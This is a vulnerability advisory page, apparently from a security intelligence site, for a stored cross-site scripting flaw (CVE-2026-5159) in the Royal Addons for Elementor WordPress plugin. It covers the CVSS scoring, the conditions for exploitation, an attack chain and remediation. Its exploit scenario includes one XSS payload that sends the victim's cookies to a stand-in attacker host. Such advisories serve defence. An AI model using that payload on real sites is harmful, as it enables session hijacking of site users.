What is the CVSS score of CVE-2026-5159?

CVE-2026-5159 has a CVSS 3.1 base score of 6.4 (Medium). CVSS vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N. EPSS exploitation probability: 0.0%.

Royal Addons for Elementor CVE-2026-5159

EUVD-2026-27189 MEDIUM

Cross-site Scripting (XSS) (CWE-79)

2026-05-05 Wordfence

GHSA-6vmj-c5pc-9jfw

XSS WordPress Elementor

6.4

CVSS 3.1 · NVD

Severity by source

NVD PRIMARY

6.4 MEDIUM

AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Primary rating from NVD · only source for this CVE.

CVSS VectorNVD

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Attack Vector

Network

Attack Complexity

Low

Privileges Required

Low

User Interaction

None

Scope

Changed

Confidentiality

Low

Integrity

Low

Availability

None

Lifecycle Timeline

Analysis Generated

May 05, 2026 - 04:31 vuln.today

DescriptionCVE.org

The Royal Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Instagram Feed widget's 'instagram_follow_text' setting in all versions up to, and including, 1.7.1056 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Note that exploitation requires that an administrator has previously configured the Instagram Feed widget with a valid Instagram access token on the site.

AnalysisAI

Stored Cross-Site Scripting in Royal Addons for Elementor's Instagram Feed widget allows authenticated contributors and above to inject arbitrary JavaScript via the 'instagram_follow_text' setting, which executes in the browsers of all users viewing the affected page. The vulnerability affects all versions up to 1.7.1056 and requires the Instagram Feed widget to be previously configured with a valid access token by an administrator. …

Unlock full vulnerability intelligence

Risk assessment & exploitation conditions
Attack chain visualization
Remediation with exact patch versions
Threat intelligence from 22 sources
Personal watchlist & email alerts

Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon

Gain Contributor+ WordPress access

Delivery

Locate Instagram Feed widget on published page

Exploit

Edit widget settings via Elementor interface

Install

Inject malicious script in 'instagram_follow_text' field

Save widget configuration

Execute

Malicious script stored in database

Impact

Victim visits affected page

Step 8

Script executes in victim's browser context

Recon

Gain Contributor+ WordPress access

Delivery

Locate Instagram Feed widget on published page

Exploit

Edit widget settings via Elementor interface

Install

Inject malicious script in 'instagram_follow_text' field

Save widget configuration

Execute

Malicious script stored in database

Impact

Victim visits affected page

Step 8

Script executes in victim's browser context

Vulnerability AssessmentAI

Exploitation	Exploitation requires three specific, concrete conditions: (1) The WordPress user must have at least Contributor-level role (PR:L in CVSS vector), meaning they can create and edit posts/pages and modify widgets; (2) An Instagram Feed widget must already exist on a published page or post, and it must be pre-configured with a valid Instagram access token by a site administrator (this is not a default state); (3) The attacker must have access to edit that widget's settings, which is typically restricted to Editors, Administrators, and the page author if they have widget-edit permissions. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment	The CVSS 6.4 score reflects a moderate but genuine risk: network-accessible vulnerability with low attack complexity, but requiring authenticated access (PR:L) and limited to Contributor+ roles. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario	A malicious actor with WordPress Contributor access (e.g., a rogue employee, compromised account, or invited collaborator) navigates to a page containing the Instagram Feed widget. They edit the widget settings, locate the 'instagram_follow_text' field, and inject a malicious script payload such as '<img src=x onerror="fetch('https://attacker.com/?cookie='+document.cookie)">'. …
Remediation	Update Royal Addons for Elementor to the latest patched version beyond 1.7.1056 immediately via the WordPress Plugins dashboard (Plugins > Installed Plugins > Royal Addons for Elementor > Update). … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

More from same product – last 7 days

CVE-2026-8157 HIGH This Week POC

8.8 Jun 22

The Vitepos WordPress plugin before 3.4.2 does not properly restrict the roles that can be assigned when creating new u

CVE-2026-8089 HIGH This Week POC

7.1 Jun 17

The weMail: Email Marketing, Email Automation, Newsletters, Subscribers & Email Optins for WooCommerce WordPress plugin

CVE-2026-9570 HIGH This Week POC

7.1 Jun 17

The Taskbuilder WordPress plugin before 5.0.8 does not properly sanitise a URL parameter before echoing it into inline

CVE-2026-4259 HIGH This Week POC

7.1 Jun 22

The ultimate-woocommerce-auction-pro WordPress plugin through 2.4.5 does not sanitise and escape a parameter before outp

CVE-2026-6858 HIGH This Week POC